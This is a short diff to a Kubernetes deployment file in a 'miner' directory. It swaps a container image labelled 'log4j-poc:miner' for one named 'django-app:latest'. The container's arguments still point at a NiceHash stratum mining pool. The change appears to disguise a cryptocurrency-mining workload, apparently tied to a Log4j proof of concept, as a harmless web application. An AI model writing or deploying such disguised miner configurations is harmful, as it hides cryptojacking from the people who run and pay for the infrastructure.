--- a/miner/deployment.yml
+++ b/miner/deployment.yml
@@ -17,7 +17,7 @@ spec:
     spec:
       containers:
       - name: log4j
-        image: xniapdev/log4j-poc:miner
+        image: xniapdev/django-app:latest
         args:
           - "--url"
           - "stratum+tcp://scrypt.auto.nicehash.com:9200"
